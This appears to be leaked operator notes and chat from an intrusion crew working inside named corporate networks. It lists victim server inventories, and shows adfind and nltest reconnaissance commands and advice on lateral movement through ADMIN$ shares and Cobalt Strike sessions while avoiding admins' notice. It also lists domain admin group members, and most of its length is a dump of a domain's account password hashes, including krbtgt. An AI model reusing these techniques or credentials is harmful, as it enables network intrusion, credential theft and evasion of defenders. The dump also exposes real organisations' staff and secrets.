So that not to spend half a day on the settings. please```Thank you``` rcgem.com 192.254.71.150:20550 XG0zyAlTM5NMZ4DAYQs3EPK8Mttj1dKRqq6 ``Gone to the offy I'll write back as I pick it up or should I throw it away too? ap.panavision.com ================== DC SYD-DCON-02 SYD-DCON-01 AUS-DCON-01 ---------------- EXCHANGE SYD-EXCH-00 AKL-DCON-02 ---------------- SQL SYD-MSSQL-01 SYD-APPS-02 SYD-ALMS-01 SYD-ITAP-01 ---------------- FILE SERVERS AKL-FILE-01 AKL-FILE-02 SYD-FILE-01 MEL-FILE-02 ---------------- WSUS SYD-WSUS-01 ---------------- could not find host AUS-RDSB-01 SYD-ITNET-01 SYD-APIT-01 - timeout SYD-APPS-01 ---------------- HYPER-V AKL-HYPV-01 SYD-HYPV-01 MEL-HYPV-01 AUS-DCON-02 ---------------- PDQDeployService SYD-PDQM-01 ---------------- PRINT SERVER SYD-PRNT-01 ---------------- DPM SYD-DPMS-02 ---------------- ?? SYD-ITMG-01 - orcestrator? SCCM / WSUS often see other segments and 95 more servers which are not distributed na.panavision.com ================= DHCP ATL-DHCP-01 NYC-DHCP-01 WDH-DHCP-01 ------------------- DC DEN-DCON-02 DEN-DCON-01 WDH-DCON-02 ------------------- EXCHANGE PNA-BURDC-02 PNA-ALBDC-01 NOL-DCON-02 PNA-WHEXCH-01 PNA-WHEXCH-02 GBL-EXCH-01 ------------------- MSSQL WDH-SWSS-01 DEV-WIND-01 SQL-WH-03 GBL-SWSS-01 ------------------- VEAM WDH-VEAM-01 WDH-VEAM-02 ------------------- SCCM DEN-SCCM-01 ------------------- WSUS DEN-WSUS-01 ------------------- FILE SERVERS TOR-FILE-01 VAN-FILE-01 NOL-FILE-01 WDH-FILE-02 CHI-FILE-01 WDH-FILE-01 DAL-FILE-01 ------------------- Terminal Server License Servers GBL-RDSB-01 ------------------- SQL PNA-SQLREP-02 GBL-SQL-01 DEV-MSQL-01 DEN-ESQL-01 DEV-MSQL-02 DEV-SQLM-01 DEN-SQLP-01 DEN-SQLR-01 DEN-SQLU-01 DEN-SQLA-01 DEN-SQLM-01 DEN-SQLS-02 WDH-WIND-01 WDH-WIND-TST WDH-PRNT-01 DEN-MDPM-01 WDH-NAVI-01 ------------------- Hyper-V PNA-HYPV-06 PNA-HYPV-01 PNA-HYPV-03 HWD-HYPV-01 GBL-HYPV-01 PNA-HYPV-04 PNA-HYPV-02 PNA-HYPV-05 BUR-HYPV-01 VAN-HYPV-01 NYC-HYPV-01 ALB-HYPV-01 TOR-HYPV-01 CHI-HYPV-01 
ATL-HYPV-01 NOL-HYPV-01 WDH-HYPV-01 PNA-HYPV-CL ------------------- Sharepoint DEN-SHAR-01 DEN-SHAR-02 DEV-SHAR-01 DEN-SHAR-03 DEN-APPS-02 DEN-PVSN-01 DEV-MSPS-16 ------------------- RDS GBL-RDSH-03 GBL-RDSH-01 GBL-RDSH-02 GBL-RDSH-04 DEN-RDS-01 DEN-RDS-02 DEV-MSGP-01 ------------------- Disabled Servers DEN-APPS-01 DEN-ENGS-01 DEV-GPER-01 ENG-WH-01X EREQDEV PNA-APPFS-01 PNA-RTRC-01 PNA-WEBAPPS-01 PNA-WHGP-01 DEV-MOOS-00 ------------------- Nutanix AHV. (Virtualization is no longer a complex layer of the IT stack that is licensed, deployed, and managed separately. Nutanix AHV offers a secure, enterprise-grade virtualization solution that streamlines operations). DEN-CMDB-01 DEN-DVOP-03 DEN-ECOM-01 DEN-EREQ-01 DEN-PDQS-01 DEN-RTRC-01 DEV-MIIS-01 EREQUEST GBL-ADFS-01 GBL-BIGS-01 GBL-MSDS-01 GBL-TMDS-00 PNA-WHSBX-02 ------------------- Please check the name and try again DEV-GPUG-01 GBL-SWAS-01 PNA-SP-01 WDH-OMSA-01 ------------------- FILESTORAGE? (Azure Backup with antivirus) PNA-ALBFS-01 PNA-BURFS-02 PNA-HWDFS-02 PNA-NYCFS-02 DEN-STFS-01 ------------------- HTTPD WDH-CCTV-01 ------------------- SolarWinds WDH-SWAS-01 ------------------- PNA-ATLFS-02 Request timed out. WDH-WDSS-01 Request timed out.
```
shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txt
shell nltest /dclist:c360.losal
```
est @user1 @user3 catch it. You should be careful with it because it gets noticed quite a lot; so, if you run it 3 times in a row, the admins will notice the network load and throw everyone out.) Server and user OS; it checks the shares on each PC in the domain. I was more about the algorithm itself.
It performs two functions at once: if we start it from a user context and immediately see available ADMIN$ shares, it means we are local admin there and can already move there; if there are no such machines in the network, at least we get a list of shares available for reading, which may contain information relevant to privilege escalation. You understand how ShareFinder works, don't you? And server subnets at this scale are better to scan as /24. So you need 20 domains: take off ad_computers, ping the servers and connect to the port? No, in 1 domain) In each domain? Of the pluses, there is already DA; of the minuses there are still 19 trusts, I'll tell you when I run it. We get burned automatically on such fruitovorov; they pass you and see that you did not produce anything on 10 sessions in the Cobalts. I pass @user1 @user3 sessions on the case xD Seek ways to the cloud, look for the cradles. http://arhangel.ru/fortune/online/taro/maps will prompt the right path. The algorithm is clear, but what if the AV is cloud and its server is not in the network?) AD certainly does not need to be taken off, but you can) Well, the algorithm is clear, go fix the same, but is it enough for you?) Portscans, sorting; this is it, all. Take off AD. Take off the horses. So what did we do on Saturday? So, let's move on to the practice of the network. What a mistake, let's move on) Who and where? @tl1 add us to their chat. Good morning :space_invader: good morning to all. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator bkadmin bkgrant bknoticing bkupexec casey.covello CMAdmin DCUser executive jimi.bingham monitor.acct robert.nye serviceacc SPCentral SQLAdmin stanleyford trust tyler.terzigni Vincent.Velardi The command completed successfully.
``` ``` Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator BESAdmin bkadmin bkgrant CMAdmin DCUser robert.nye sharepointadmin spadmin SPCentral SQLAdmin stanleyford trust The command completed successfully. `````` [DC] 'grantweber.com' will be the domain [DC] 'GWCADC2.grantweber.com' will be the DC server [DC] Exporting domain 'grantweber.com' 502 krbtgt 15c319c968a55d7d1fa8fc9086fded2c 514 6132 GWWAEXCHANGE10$ 545d9532ab95be32e700ecfc7b500e69 8192 1001 IWAM_EXCHANGE03 3ff3411a7f9ff3a4f9856de7a592e666 66080 1004 EXCHANGE03$ e0f80d66c57605d0172ce85fb0a3eaa5 4096 1606 GWWA-EXCHANGE$ 70c8d55d9fd38d745e5c2fec07c48a7c 4096 2107 GWCAEXCHANGE1$ 36836a3e93cc34909122d1ffa215cabd 4096 2605 IWAM_GWCAEXCHANGE1$ 8060534b317ea48b1b8e1a8132919fbc 66080 2626 GWCAFILE1$ 77b15f9c41c04f41278c57031b7a4e0f 4096 2734 GhostACCTB241-PC 7d55e037e823346aec331580100db8eb 66048 2746 USBBOOT$ 6923fbee7d72c6085962057f6e0b7e93 4128 1675 GW-SHAREPOINT$ 207c55f020739dbeb7dbc242b7902dae 4096 3109 ACCT227-PC$ dec14618368d8acbd6672239f1ce5400 4096 3119 ACCT93$ 24be4e1193d82d7d386b0a49998fd5d0 4096 2701 gwscans$ 202a5a7042c3211b8ab6bd2a881c4da3 69632 3112 ACCT194$ 89f78cf00b99a1ab3683e2ea4b3763c0 4096 2769 ACCT171$ 46eced10b3f3b1f66d5bdc4b0834e3da 4096 2770 ACCTB45$ bba29665d27d53c8857bddd968c0185a 4096 3111 ACCT80$ ea762eafa745041d632095dca34642a9 4096 3118 ACCTC103$ 4d8ec7d625b5ae297e720e958aab2375 4096 1719 TRAIN-17$ e23f7bf247b5607d2a36fc32e23eefa0 4096 2787 ACCTB43$ 4b06b1b84a147cbc7ad764b62f5aa578 4096 2807 ACCT19PC$ 4a88e0ffefbc0a8b48cf3dd7bd127cb4 4096 1710 ACCT63PC$ c9f34a6a641cd99054ced1cad22614e9 4096 1727 ACCT22$ 942eb8af91a482cfc61c3e6855bff216 4096 1681 ACCTC54$ dedbe20070d81179f16184a9a840a8b7 4096 2800 TRAIN-11$ 398711106db9cee649a5a83f2f57b7e7 4096 1700 ACCTB9PC$ e13f7fafae80f2ff05cf2646bce4b37b 4096 2826 TRAIN-14$ 05ef4f47216c52fd8df0c3993106f56b 4096 
1707 ACCTB64-PC$ 58db1e841b72ee05b382506ecfd74680 4096 1657 bkadmin 1b456a1caf1df68632fdf0a568652610 66048 3127 ACCTB16$ 6d398518b42d2f236e6961a5b7126a89 4096 3106 ACCT69-PC$ 128586aefd23412eba3b8c2a860092fb 4096 3130 ACCT96$ bf8ed6433b44b1e81715e32e06595aa6 4096 2866 ACCT24$ ba9255367edec9209abebb3097fbdf45 4128 3135 ACCTC116PC$ bc075e7a2d20c31fb6177a81a3cdb1b3 4096 2198 ACCTC183$ a3ac25d5d8c76ff30a20b049eea34e54 4096 2178 ACCTC118DP$ cfbbc5dd8c3701e936bb8d996dcfbc5e 4096 2247 BES$ 558e83a15f6c70662341212110231092b4 4096 2832 ACCT46$ bf86151a25ab99f99fb1ea128f334bab17b 4096 3143 GW-WA40-PC$ 61a0b8a712ed53ab374743f124c825ea 4096 1731 TRAIN-14C$ e476f5b444040653adbeb21f0fc692bb82 4096 3141 TRAIN-13D$ 3386e371695b7112116c838a9cc5e151 4096 3139 TRAIN-20$ 3eace7e847ad851bb4407f430930cf54 4096 3140 TRAIN-12B$ 671ec214a030d5cfcd033149453dcce7 4096 3123 TRAIN-12$ 2781b324ef3ef996849b1fa50bdee9b86 4096 2153 ACCT74$ adbb4fafd64da1bfd94143acd72dd969 4096 1725 TRAIN-01$ 89667119b31fb24097d66d8b33e09c 4096 2259 GW-CONSULT2$ 055ebf3da091f59606c419b1b4ec951d 4096 2184 ACCT75-PC$ 9fbdb81a6d004d8c92a90f90dccbc2cd 4096 1737 ACCT195-PC$ fe400a95c6c52062edd3dd0ad72ee53d 4096 1730 TRAIN-19$ bd4aa7f45817112328d656cdf712c507 4096 3137 ACCT17$ b0c61bb3562e499f297eb89c80e658f9 4096 2802 TRAIN-06$ 1a872d1740bbb272c8ad32ef128f1ef5 4096 1686 ACCTB20-PC$ 7b8346c3e2b303b7d1d3476f459db9d9b 4096 3117 ACCT191-PC$ cfbf9696af17fde734317936be8b0ccf 4096 2831 ACCT97-PC$ 2b10f55e38b2cc135173e5cf43a1a3 4096 2270 ACCT153$ b646cd4b0c984a6892e5228b8e1fbf17 4096 3134 ACCT44PC$ af7f8f58f191c052eb80b4e078196884 4096 3149 GW-CONSULT5$ 79081eff247d3cea808aa9d30ebad8f2 4096 2779 ACCT148-PC$ d9c7529010a4271fee071442f48386fd 4096 1706 ACCT76PC$ a62180c29d4df647416fde0002e92f9f 4096 2808 ACCT5PC$ 43f8e0437b5a018bd4633a7288e853fb 4096 1669 bkgrant 89b9cc0a76316bca09be51763145cc2b 66048 2781 ACCT145-PC$ 0a15008fbae6ba396cf10faf1e8715b0 4096 3158 GW-WA83-PC$ dc3e927b46b9d310f5027b0083a67428 4096 1676 ACCTD106-PC$ 
7117b9bb9daa4348d1566ad2f05e092a 4096 2194 ACCT98-PC5$ a3c07467dcd86d28a9f254e6d40641a 4096 2943 ACCTC104-VM$ 0fe5402b11b396b44bb8d0f02fc5fb79 4096 2924 DASHBOARD4-PC$ dcc270a001f9b80eb6170cd4ccb4770a 4096 2159 ACCT20-PC$ 5b4fe92a20406f1ec2942b4ba0e957cb 4096 2186 ACCT66PC$ b5aaa9095367e189f7bb06f38e1afdea 4096 3138 ACCT55-PC$ eb8812429e99d963312d1363944a819b 4096 1691 GW-SPARE-PC$ d9f836e4d163e51a629d2e7fd92c0460 4096 3153 SACCT70$ 473b1988586c6e49424c4bae90d280a9 4096 2865 ACCTB16-PC$ ff044c8f5e7d4e80f385a8353b7a59 4096 3614 SACCT72-PC$ 2751ea513718f3c6d6ea3440e6cc5f16 4096 3132 ACCT176-PC$ 73699d27c53f7c0182f1e33f28014452 4096 2859 eotrain 95e64555a2bf0b30973deb446ff3e11c 512 2240 ACCT77D$ 24e83f0bf7d3237a044d2d91df038fa3 4096 3032 TST9999 865bbdd57f5b35fc818f6bcc3f59385a 66048 2292 DASHBOARD3$ b95009ffaf7090efabed7f229f493029 4096 6105 nas$ 5b93de3dabca9e3062bdad9f75cfc537 69632 3124 ACCT219-PC$ ec893c500bb3fd1489a496b64e91551a 4096 2313 GWITLT$ 9e5132cebd7fe17415dac9c832b3909b 4096 2771 ACCT196-PC$ 8a90c50a38df3b2cf5ad8fd23627cb54 4096 2944 REMOTEACCESS-PC$ a7080819ef6f74062649415902983cf2 4096 2855 ACCT73PC$ 3a0695bf4e005bee82b72264e49dbc85 4096 2320 ACCT341-PC$ 0b5003a7f59e07f551e5dd346409b3b6 4096 2331 ACCTB83-PC$ b4b0fa9037999f90d18cb91eb90fefd9 4096 1680 ACCT98-PC$ 6128093c6364040240186320c947571d 4096 2886 ACCT49-PC$ b689b0de734c4a454e5d85bf5fd54c9c 4096 1749 GW-CONSULT8-PC$ af07a5d39c075f1ef37ce4e3d82fd782 4096 2814 ACCT246-PC$ cc5f92e211a820c3cabec397d4319810 4096 2985 ACCT84$ 025e4e17b33016be4dede1cb44c6789d 4096 1769 LEGAL2-LT$ c5f1e1fc78d9b296016f6ef31f102d41 4096 1733 ACCTC116-PC$ aa5a3c9def811f9a6f2ad80655da574f 4096 2960 STAN-PC$ 13b4b66d374bedcedc4c9c4e989a203d 4096 2337 ACCT355-PC$ 04693b82dee990a7365768ed0182b7be 4096 2340 ACCTC83-PC$ 27dbff84d9733e07cf35da46b1e68928 4096 5178 GW-CONSULT10-PC$ 320012a8fca583464a5232b41d515136 4096 1718 ACCT196$ 619f8c6bb7f03bdc306f630cfb0842f 4096 2277 GW-CONSULT6-PC$ 8fff385bcd2d4c6cb57c9495b215ac55 4096 2606 
IUSR_GWCAEXCHANGE1 b8e69421675fe80aa3dc8d4cb5120d36 66080 1607 5C27EF39-7B4B-4E8C-8 bebff5378c6ca8ff84956200a3c64534 514 1647 7B4E2B22-520C-4020-8 dab3c74e73ca582a5dc57958acd0ced1 514 1763 7D67A2A6-7662-4B03-9 7e936f7600aed327fc27de7937f17197 514 2185 ACCTB24-PC$ a7b74a283da851596ccb3efe5b567b 4096 3615 SACSERVER$ 7670516c49886b2271b5864f6e065cae 4096 3121 ACCT55$ 05f0eb44aab98b4b7a6482bdb8ab3ca3 4096 3170 ACCT340-PC$ 899099863ba8f9078509960309d83171 4096 2837 ACCT92-PC$ a1ea7626ed1087619106c43cc9f206f4 4096 6106 LEGAL3-LT$ e6d5f6c8b0ce0e5ddab2d15b248932c2 4096 3215 ACCT401-PC$ 0418011e3a9f7440a82b5b17b5a298278 4096 2314 DIALERSTORAGE$ 84f8c877314b608d8b7f520f6a36d56b 4096 3136 ACCT238PC$ 5656acd14aaae65e59ce7e2e08b8b625 4096 2370 GWUSER$ 6241db503d2b2262aacabdcd3d2f0552 4098 3116 ACCT175-PC$ a27cc8cebd8cadded199f549d806b4f8 4096 1684 ACCT30-PC$ 50c5673058be5db877e22596f5f9d18d 4096 6134 ACCT397-PC$ 93bb816af6a3bfd95ebbe3786c9951e0 4096 3202 CONSULT11-PC$ 04688f389c97d4ad564eda3a751ecc1e 4096 2291 SUZAN$ dabd2c3a28776c9fcd328fea9d57f6a4 4098 2377 WSUS$ 6824190b32eda841f2d358c14fadd9f5 4096 3617 SACCT70-PC$ d87f4e43c4e8bae08253ab5ac78abe46 4096 2276 ACCT306-PC$ 1f36dcbf52528d4a13395279da723851 4096 3177 ACCT349-PC$ 8795e0a1bab9d1e6687b6040bc5dcdb0 4096 2861 ACCT50B-PC$ 2576983549aa546ef524698f317c7d85 4096 3628 SACCT119-PC$ 1216f93fa913fe69714bcd13115cef4c 4096 3016 SAC-4$ b6c76f5b306c3c6c004f0aa3ec0a2543 4096 2830 SACCT105-PC$ b963db81b8ba0c7974b7e8a1f84c16fb 4096 2780 ACCT17-PC$ 637e1678d38bde72331cfef0e9ec4cae 4096 2263 GW-CONSULT3$ d179883daa60d15d07564f5b6c7ada67 4096 7208 Jamal.Barksdale 86d88cd4b1d6696f7c52b13da4bb8243 66050 4110 ACCTC112$ ca94640122fb740408dccbd5214b182a 4096 3144 ACCTD118$ d5c2164af89c24d0412bc2be60262a16 4096 1671 ACCT216-PC$ 990fb5924a787f4c0582b02e5c1463e4 4096 2108 2AEDBB69-50BB-4AC3-8 9284a75a08f061a51c080f97c8c3fb4d 514 2815 65F4A425-FF56-464D-A 3512fb7e385018cae92abe0c5a098162 514 3152 ACCT300-PC$ b4a91004ddbc4f2fb00c846670328d40 
4096 2768 ACCT45-PC$ a2a74e6c9e5e0549788661bb07c5fc88 4096 7125 SPICEWORKS$ 8e01c56bc53a966fe7e5838e69ddce21 4096 5177 ACCT395-PC$ e6b0fcee9a98949d7df94caf7fe84597 4096 7246 GW-CONSULT9$ dbc09aa5f8807e10153b9335abb0fd31 4096 6164 SACCT110-PC$ b5e2a571db568ae073edd6a2f55b58c3 4096 3637 SACCT126-PC$ 721fd4028a9f1f463cf1131d9bad8dba 4096 5179 SACCT96-PC$ ff081f47e9851a9e3f65b62805d68310 4096 3627 SACCT118-PC$ 8bcdbfbebb136f466cd04da3cf236e7b 4096 3235 SAC-1$ d7a561ca6f0f7f0e4e4cdc386be05005 4096 1692 ACCT29-PC$ cf50680e2fe05f3ea6be13bfc6bad6fa 4096 2334 ACCT359$ e47d7e9a97e78d4ee0e085400139a6ed 4096 3188 ACCT371-PC$ ace4b1e1214006fe4c5e12be17e64409 4096 2161 ACCTB29-PC$ 7a95cf9baf1f3be0e92da417d1b72f83 4096 1723 ACCT67-PC$ 6ef6ea9e27a0d4136ff04166057ed50f 4096 2773 ACCTB54-PC$ 9d0783647bb5f492b4e3b1e819f3ddc3 4096 3609 SACCT75-PC$ 81dc4823776ea053a2d93ca834fbdbca 4096 3606 SACCT80-PC$ e3088ddf49b0c3f1b9005e5cf1e3ecd 4096 2883 GWCONSULT1$ 524758e5ffc791143b9b8e182098e3ff 4096 1768 LOUNGE-PC$ c0b480bc86a863356500ea6e336ca2b2 4096 6171 GW-PAS-LAPTOP3$ 45fe3080fc95b843abf7923814e1227a 4096 3611 SACCT28-PC$ e98e89ca6d7176d69db9e22bd8b49def 4096 3619 ACCT105-PC$ 69333f3467d4789b123991d102d1dff4 4096 2792 ACCT205-PC$ bdf09cae26a2e27ab44e1c9d981baae5 4096 2344 SACCT86-PC$ 829552c07c9ea6a56223592e61f892c0 4096 3205 SACCT93-PC$ efae1f76fc318dd69b8819f8a23e5545 4096 3616 SACCT73-PC$ 56bfc8cc93d394f0389a4c6c84d5278a 4096 2187 ACCT165-PC$ ff10008a9f2f09b1af24a704102f1a9e 4096 3613 SACCT63-PC$ 7bc8cdaf91ef9acd70b7c863b8c7da57 4096 2369 GWITLOANER-LT$ cf7ccac9c413e2d37b005cdd8a27dc1a 4096 1738 CINDY-LAPTOP$ 570b01443004d9d4ce84e25927e4eb8a 4096 7252 GW-PAS-LAPTOP2$ a045f473828e0def06acf5dfc9f9abce 4096 2923 SAC-3$ 7c0f29729bc5464156d724e8c48395f9 4096 3151 ACCT73C$ 93f0e048eff4855fc997132c9980cc6d 4096 1708 ACCT7-PC$ 24bbd348fe0055bc462f8915cba1e270 4096 3605 ACCT80-PC$ d945250377f1f776aa34731f29509426 4096 2875 ACCTC118DP-PC$ 06c808fa066699224c03dc47b668db52 4096 3113 ACCT44-PC$ 
3502d138825124bb09848eec69b33c3c 4096 2327 ACCT347-PC$ fb3537b383ab68acd3bb7b73e3fcae8d 4096 2803 ACCT40-PC$ ed6dc6ce56b73985b8ef982b3f0a2a5f 4096 2912 ACCT307-PC$ a24b95e025da02435e3aa74e9ccdb47f 4096 3133 ACCTC106-PC$ e710b904e142b5bc5936630a7c9ec10a 4096 3184 ACCT361-PC$ 12bfcf8e297ff4a62cbfb0df7cb07020 4096 2166 ACCTB103-PC$ ab2f6ef75d05063c419fe8745b77d7ba 4096 2167 ACCT4-PC$ d7f1ca2a7c14abe08edc3814aec0a9bc 4096 1734 ACCTB80-PC$ 7313e2599266f2a528d02f81af9860fe 4096 2268 ACCT320-PC$ 96d592a53a183b5e937b490af02410b9 4096 6147 ACCT405-PC$ 52af08d8500a76ceb828653294396321 4096 1728 EOCONFRENCE-PC$ 0f788c421dbbe142cdee041648cc6173 4096 2191 ACCT72-PC$ 46ee0872999973ca18ffc28d95df09ddc6 4096 6137 ACCT399-PC$ 988676a07b90130c3d61005ecce41f5c 4096 1705 ACCT65-PC$ 30ab09fdb753fa2f3093dd1e702b4353 4096 1714 ACCT173-PC$ 4ff6a3a5c5aa5c3e85ed496a5ea1fa1d 4096 6178 spAppPoolAcc 0e35475fb1d93d0d45723699b35a6296 66048 3610 SACCT64-PC$ c8bcd2d01e8c9886d7fb58f940d767aa 4096 2293 ACCT316-PC$ da1e3219104bc987f98598379bda921d 4096 2953 ACCT315-LT$ cfa6b2072a8b22e19a5c0a1f69a7596d 4096 1740 ACCTC101-PC$ af9468d9e2b4398e46507a2512991e4096 6122 SACCT92-PC$ ae6bd52548f7b201adbbfdc1b39e3d64 4096 3211 ACCTC241-PC$ a562ebf59f9ef66504c0a9753352f0c4 4096 4610 LVACCT219-PC$ a7c4b8a7b80d9831f58b71afc6fb9085 4096 1002 IUSR_EXCHANGE03 2ba13297e394c23bfdb2299b9b3bf064 66080 3608 SACCT67-PC$ a30e5cf2cb6d2a2900579203829ff88d 4096 3107 ACCT156-PC$ 0287018808261b64eace90b93b72edaa 4096 2939 GW-CONSULT9-PC$ e6ad080de7ae81e65c4e20c27c11d94d 4096 2783 ACCT192-PC$ 764a3ba2df40e6d655c034b155b69082 4096 2884 ACCT16-PC$ f868d5880ff2ae063ff920390e810e74 4096 1685 ACCT60-PC$ 010d2ca007c198323e3b3e9e09b70683 4096 2151 ACCTB15-PCN$ 3e8a23e3da1afc7a988d11d7dabd0f76 528384 2265 ACCT7796-PC$ 11fcefa4e2bf2c6b6a028790babaed33 4096 1764 MARYTEST-PC$ d18ad961b661eba8396b844d70eeacc9 4096 2867 ACCT24-PC$ d6682c44404cfd7e01b53aa9677291a5 4128 3180 ACCT360-PC$ b187c10e997401aedbe984520e66f971 4096 1750 DASHBOARD4$ 
91dcd81addd835d1590c072e32503c53 4096 2789 ACCT77-PC$ f002df775f0d3daf8907bda66cde4dcb 4096 2170 ACCT178-PC$ a8f4f83c94c89fe4b88a1bda746aa44b 4096 2326 ACCT15-PCE$ 986cea938b0e76fd2b6370747545fa2b 4096 1299 trust 2cbdec5023a03c12a35444486f09ceab 66048 1752 ACCTC106PC$ c9a9c7339ada2df5b31901d69766f7a8 4096 2257 ACCT19-PC$ d209e127f45f7fdd71ad5116136d5f57 4096 2990 ACCT332-PC$ e70101994b1006d1444aa35812052800 4096 2324 ACCT344-PC$ 46e43f8632bae8b632ea83f0ed0ca508 4096 2817 ACCT166-PC$ a290a8d86a74eb4c84166c54537e471b 4096 3114 ACCTB10-PC$ c33865f3dd763031e096e54ee5045f15 4096 1758 ACCT323-PC$ c56310b1207934133ea7046aa2a75f2a 4096 3165 ACCT324-PC$ d55c832ebe8b39a58f468deb06d998ea 4096 1683 ACCT48-PC$ de9f69783be79c39052ec19121c841f9 4096 4612 LVACCT185-PC$ b3fa0979a75a0d41f7ff1edf74f0f0fd 4096 7343 JIMILT$ 5a089c75d4d7eda5bbdd7c2c8cbda4af 4098 3181 ACCT73-PC$ 00debc7dbe3f3638246af106c11f7b32 4096 2785 ACCT35-PC$ 6bfff919e97373199fe7a51f0c8b9e32 4096 3182 ACCT359-PC$ 4c9b94528fed629c5c70bed5424e8878 4096 3126 ACCTB56-PC$ 6ca08d49a7ddf764e2e89e04b99fe69b 4096 3219 ACCT404-PC$ 3d8f5558614bb9a014f6d004bf8e820f 4096 2243 ACCT154-PC$ 4dc470e2d83523eb9921579065232e0e 4096 2146 ACCT234-PC$ 968745c3a7ff443debf22bef1beaf9e6 4096 3105 ACCT50-PC$ 24959ec7c63eb80ec792f3f89d99579f 4096 3157 ACCT343-PC$ f17bbdbdb99d8fb5d5fb03306980709677 4096 3147 ACCTB131-PC$ 22dc6c485920432cad60f54d1d2898fc 4096 2372 SPENCERTABLET$ f6cc4d3309c06e842570cc9b858e6fef 4096 1679 ACCTB11-PC$ d57c9ec6ccf3dd7e04ebc4d128f77706 4096 1695 ACCT91-PC$ f459cf6d690274cb5e88b986e2fe747b 4096 2287 ACCT312-PC$ be7a01c2c5dd0b79ee5c7ce0d9173382 4096 7166 ACCTTYLER$ 82396e2f84ac7de6151b1864b4f7fb98 4096 2288 ACCT98B-PC$ 0b8519485909099448f281f7fb783cb615 4098 3284 TYLERGW$ d938f624f2c9088fc57449b4c0731224 4096 3209 TYLER-PC$ 4f0d4a4c8e37299e75c382f70ff51491 528384 1745 ACCT310-PC$ 829c3d89400d728a33cbf303064407c3 4096 6192 SUZAN-PC$ 2ba3dc186ad1624b29f63022127dae45 4096 3618 SACCT74-PC$ 
8d14b1b9ffd2095ce48d9252c577ed14 4096 7397 LEAH-PC$ e35d5da75a941e5b28caaf341b46e7e7 4096 1751 LEGAL-CONSULTPC$ 1e699f95e48cefadf602a33c31e3d35d 4096 1742 ACCTCUMGT$ ddd8ce5cade4edb4fe4c9afbf2026038 4096 1754 ACCTB128-PC$ 7bda1d4e16e11bd8864322c330bf6f78 4096 2332 ACCT351-PC$ 34ae1686afa5016e3ae430af574cc54e 4096 3620 SACCT68-PC$ 40322c275234804ed9fe54e4801f650e 4096 3185 ACCT364-PC$ 0b2155393f4d1376bd09165ce9d2b703 4096 2188 ACCT47-PC$ dbbd4ab9077dd985262169065a6269c4 4096 2971 SACCT81-PC$ fd66cdcaaa559295268b75c9e0e7af4e 4096 7109 ACCT406-PC$ 53214a2704da24daa93ca13de12910c1 4096 3286 LEAH$ 1438e5c85a8a2c300b2972422c12c6e3 4096 3175 SACCT82-PC$ 721ec4d2fd06b2b554002adeef687fe1 4096 3129 LVACCT62-PC$ 78307992aebacbb276612ebc22e0363f 4096 2254 TREVORSIMMS-PC$ ecad1b0512ba84f74c59589c406f9712 4096 2269 MARYKEMPSKI-PC$ 4e91fe5907d54f3e7113b8c368674cbd 4096 7429 ed.lopez$ 376bb4419f11a3a18f76bf6ee2313e72 4096 2375 SUZAN-LT$ caea5162c19b6288e0b9901d001cdca4 4096 7430 cmservice$ 1ef5f75bf297e7ae2a4fe8d64de87ac 4096 2381 SACCT114-PC$ 41c7bc3018ee819fe766adfed814122f 4098 7424 EUREKA$ d02d57ba833c79c9800f9912f58d347f 4096 3635 SACCT125-PC$ ba2354e81ab8c8fc000f9e9479ff025d 4096 3630 SACCT121-PC$ 94606cbc50640a064da8a0f0d3d47177 4096 6197 SACCT111$ 91ee699a785b68cfb125f8b316380337 4096 7425 jon.depetro 089278e49fe7628e74f1bd6c1d2f7ebf 66050 7426 CMSupport ca112c4a89b7c9b6c78ce56d66af 66050 7421 CMAdmin 2c09e6e5f0e52434c8772b00531f465e 66050 7428 ed.lopez f10c34032c60c25480f25fe7955768e0 66050 7422 cmuser 2c09e6e5f0e52434c8772b00531f465e 66050 3178 ACCT350-PC$ 8fdd4c5396c54235114c5c051b523b01 4096 2962 ACCT193-PC$ 0c07a2c292ecce98784c01cf9da88959 4096 3122 ACCTD116-PC$ 612a1f87a34e429113ecb51f4f1cad92 4096 3634 SACCT124-PC$ a2a928d9e49d9ac918e8729ffe22ce31 4096 1690 ACCTB15PC$ d49ec91d827d833c6ab103b1d007900b 4096 3638 SACCT128-PC$ 0df8fb13c86efbaca14660d608c03853 4096 2345 SACCT88-PC$ f48c6eff4a8cdd3c9b63d631c7f4cdab 4096 2147 ACCT206-PC$ 991982aa4a7463db68d58722130da81e 
4096 6117 ACCT381-PC$ 0c9f7accb9ae1901e3d016d4e60c106d 4096 1693 ACCT26$ cd67d4bd81b0808dc2f55e19e7d20d6e 4096 1759 DCUser 080047c7ab8205dfdf6498df928c3af1 66048 3291 MARY-PC$ a95722c065ddafe3bbe7477046e38bb5 4096 1713 ACCT229-PC$ 7aa4d7e6a901bffe67033399b698719e 4096 3277 ACCT2132-PC$ f11f183c2c928c63cc913faf6746c35f 4096 7386 GWLAPTOP-PC$ 26832f1189dd2e6b2f8ca1935aaab076 4096 2893 ACCT54-PC$ 8dd532bb60adf0976756a629b8eaebd5 4096 2373 TYLER$ 8c0692413e252a84b85f0af01f582abe 4096 3191 ACCT377-PC$ f1bb4775b403275ba50b13051e2266a4 4096 1682 ACCT6-PC$ 14da85d5ffa35fb244e186d6c1f665f5 4096 1698 ACCT88-PC$ 3fb5f45bc8132de034314b2468327372 4096 3195 ACCT379-PC$ 5f264ca4713d87bc63239ae19a05fb89 4096 6113 ACCT375-PC$ 0fd0a6711a9ee65315e3c72c1d192aee 4096 4109 AZACCT50-PC$ 4727c2f29f01c9772f37acf46a9d09c6 4096 2319 DCREMOTEAPP$ aec49c02c941a198c2a04325338fd7cd 4096 4106 AZACCT45-PC$ 09c861b5fe270a67673063af7a3f6b1e89 4096 2805 ACCT16$ b15969174a42c7bf47be94c368956988 4096 1701 ACCT212-PC$ 5de16206c919243089e4285f8bf4a880 4096 6158 ACCT314-LT$ 57e9576f91c79dfa311c571fb1b533ed 4096 2988 ACCT329-PC$ cd1be4944b5828ee5b142d81aad00fdc 4096 1709 ACCT146PC$ e7e0baaffb7109a665be3f0d138d1d1a 4096 2205 ACCT146-PC$ 602c10a10d6ebfdbdbd4d3cb7547e8c54 4096 3019 ACCT337-PC$ dbafdc1c2bc9721ff083ef780c8a7bf7 4096 2335 ACCT358-PC$ 7173018d5abb36d790db36240d1b5723 4096 7217 ACCT413-PC$ cb9d655fed0fad778841fa5494a703d5 4096 